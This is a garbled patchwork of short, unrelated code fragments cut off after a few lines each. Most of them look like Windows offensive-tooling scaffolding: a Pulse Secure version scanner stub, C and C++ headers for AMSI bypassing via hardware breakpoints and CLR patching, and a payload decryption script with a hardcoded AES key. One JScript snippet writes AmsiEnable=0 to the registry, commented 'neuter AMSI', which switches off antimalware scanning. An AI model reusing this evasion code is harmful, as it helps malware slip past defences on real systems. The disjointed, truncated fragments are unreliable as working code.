| import requests | |
| import sys | |
| import re | |
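# Request headers sent with the script's HTTP calls (those calls are outside
# this excerpt). The User-Agent mimics a desktop Firefox build.
HEADERS = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0"}

# Require exactly one positional argument (the target); otherwise print the
# usage line and exit non-zero. Calling print() with a single parenthesised
# string is valid on both Python 2 and Python 3, whereas the original
# Python-2-only print statement is a SyntaxError on Python 3.
if len(sys.argv) != 2:
    print(" Usage: python pulseversion.py <target ip/domain>")
    sys.exit(1)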
| var sh = new ActiveXObject('WScript.Shell'); | |
| var key = "HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable"; | |
| try{ | |
| var AmsiEnable = sh.RegRead(key); | |
| if(AmsiEnable!=0){ | |
| throw new Error(1, ''); | |
| } | |
| }catch(e){ | |
| sh.RegWrite(key, 0, "REG_DWORD"); // neuter AMSI |
| #include <Windows.h> | |
| #include <stdio.h> | |
| #include "VEH.h" | |
| #include "ntos.h" | |
| #include "ntrtl.h" | |
| //#include "peb.h" | |
| #include "ntldr.h" | |
| #include "hwbp.h" | |
| #include "base\helpers.h" |
| #include <Windows.h> | |
| #include <iostream> | |
| #include <fstream> | |
| #include <amsi.h> | |
| #define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 ) | |
| #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) | |
| // https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/ | |
| typedef struct tagHAMSICONTEXT { |
| #include <Windows.h> | |
| #include <Psapi.h> | |
| #include <metahost.h> | |
| #include <comutil.h> | |
| #include <mscoree.h> | |
| #include "patch_info.h" | |
| #include "base\helpers.h" | |
| /** | |
| * For the debug build we want: |
| from Crypto.Cipher import AES, DES3 | |
| from Crypto.Hash import HMAC, SHA1, SHA512, SHA256 | |
| from Crypto.Util.Padding import pad | |
| from io import BytesIO | |
| import argparse | |
| import string | |
| import base64 | |
| import uuid | |
| import os |
# fix wmi
# Rebuild the WMI repository, restart the WMI service, then confirm CIM queries
# work again by issuing a ping query through the Win32_PingStatus class.
# NOTE(review): /resetrepository discards the current repository — class and
# provider registrations added by third-party software are lost with it; the
# non-destructive `winmgmt /salvagerepository` is the usual first attempt.
# Both steps presumably require an elevated shell — confirm on the target.
winmgmt /resetrepository
Restart-Service Winmgmt
Get-CimInstance -Namespace root/cimv2 -ClassName Win32_PingStatus -Filter "Address='www.microsoft.com'"
# alternative method: set high bandwidth limit for Delivery Optimization
# These values are written under the HKU hive of SID S-1-5-20 (the well-known
# NETWORK SERVICE account; presumably the identity the Delivery Optimization
# service runs as — verify on the target build). /f overwrites any existing
# value without prompting. 4294967295 is the REG_DWORD maximum, i.e. the
# background download rate is effectively uncapped.
reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings" /v "DownloadMode" /t REG_DWORD /d 0 /f
reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings" /v "DownloadModeProvider" /t REG_DWORD /d 8 /f
reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings" /v "DownloadRateBackgroundBps" /t REG_DWORD /d 4294967295 /f
reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings" /v "DownloadRateBackgroundBpsProvider" /t REG_DWORD /d 8 /f
| const ffi = require('ffi-napi'); | |
| const ref = require("ref-napi"); | |
| const Struct = require("ref-struct-di")(ref); | |
| const fs = require('fs') | |
| const ArrayType = require('ref-array-napi') | |
| var Union = require('ref-union-napi'); | |
| /* | |
| Dependencies: | |
| $ npm install ffi-napi |
| #!/usr/bin/env python | |
| import os | |
| import sys | |
| import struct | |
| import binascii | |
| from Crypto.Cipher import AES | |
# Static IV and AES key embedded in the script, each 16 bytes given as hex.
# NOTE(review): a fixed IV reused with the same key across inputs weakens
# CBC/CTR-style modes — check which mode the cipher setup below this
# excerpt actually uses.
IV = binascii.a2b_hex("0A254C2FE7AE0B7047028D6B4B2E6944")
AES_KEY = binascii.a2b_hex("FE4C8C32FBAE1AF3C4A0ABC8E1866CAD")
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| using static GetSxsPath.NativeMethods; | |
| namespace GetSxsPath | |
| { | |
| internal class NativeMethods |